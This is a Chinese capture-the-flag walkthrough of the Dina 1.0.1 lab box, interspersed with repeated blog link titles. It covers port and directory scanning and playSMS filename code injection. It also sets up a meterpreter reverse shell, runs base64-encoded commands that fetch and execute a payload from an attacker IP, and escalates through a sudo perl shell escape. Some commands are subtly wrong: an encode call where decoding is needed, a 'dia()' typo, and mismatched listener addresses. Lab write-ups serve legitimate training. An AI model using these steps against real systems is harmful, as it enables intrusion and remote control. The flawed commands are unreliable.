目录
(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客
(4条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客
靶场导入
右键使用vm打开导入
弹出导入失败 ,直接点重试
靶场地址3.137 3.141 3.148
kali地址 192.168.3.117
尝试是否能通信
扫描开放的端口
nmap -sV 192.168.3.137
扫描目录
nikto -host http://192.168.3.137
对敏感目录进行访问
说明开启了apache
点击进入
http://192.168.3.148/wp-config.php
http://192.168.3.148/robots.txt
view-source:http://192.168.3.148/nothing/
下载.zip
联想之前的密码freedom尝试后成功解压
发现打不开mp3打开属性 发现不是真mp3文件,用记事本打开
用收集信息进行登陆后台
http://192.168.3.148/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login
尝试nothing网页得到的密码:diana 成功登陆
(4条消息) PlaySMS_战神/calmness的博客-CSDN博客
网页是playSMS框架 可以到kali利用searchsploit搜索信息
搜索sms框架漏洞
searchsploit playSMS
searchsploit -p 42003.txt
cat /usr/share/exploitdb/exploits/php/webapps/42003.txt
翻译信息:
(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客
在本地创建1.csv文件(空文件只要是.csv后缀)
返回playsms网页
选择文件上传
在sms网页上传1.csv文件
打开代理,进行抓包
根据42003文件翻译信息进行操作
将1.csv改成<?php system('uname -a'); die();?>.php
进行放包
重新再上传抓包 发送给repeater 命令改为id
<?php system('id'); die();?>.phpid
进行放包
当前用户id和组id是33
以上操作说明filename存在代码执行和代码注入
设置反弹shell监听
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
打开另一个终端查看地址
set lhost 192.168.3.117
set lport 4444
run
打开另一个终端
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.3.137 lport=4444 -f elf > /var/www/html/shell
绕过防火墙
在浏览器进行抓3次放3次绕过防火墙的bash64的包
本地返回playsms页面上传文件抓包
burp在filename处放
<?php system(base64_encode('放置base64代码')); dia();?>.php
1.
<?php system(base64_encode('d2dldCBodHRwOi8vMTkyLjE2OC4zLjExNy9zaGVsbCAtTyAvdG1wL2EK
')); die();?>.php
进行放包
2.
<?php system(base64_encode('Y2htb2QgNzc3IC90bXAvYQo=
')); die();?>.php
进行放包:
3.
<?php system(base64_encode('L3RtcC9hCg==
')); die();?>.php
进行放包
进行提权操作:
Kali利用msf入侵Windows电脑(最详细包会) - 元宇宙-Metaverse - 博客园 (cnblogs.com)
(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客
(5条消息) 靶机实战-Dina 1.0_dina 靶机实验_滕财然的博客-CSDN博客
(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客
进行下面的操作 其实上面的放3次包监听过程可忽略,进行如下操作即可
输入以下命令
shell
ls
sudo perl -e "exec '/bin/sh' "
bash -i
cd /root
ls
cat flag.txt
(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客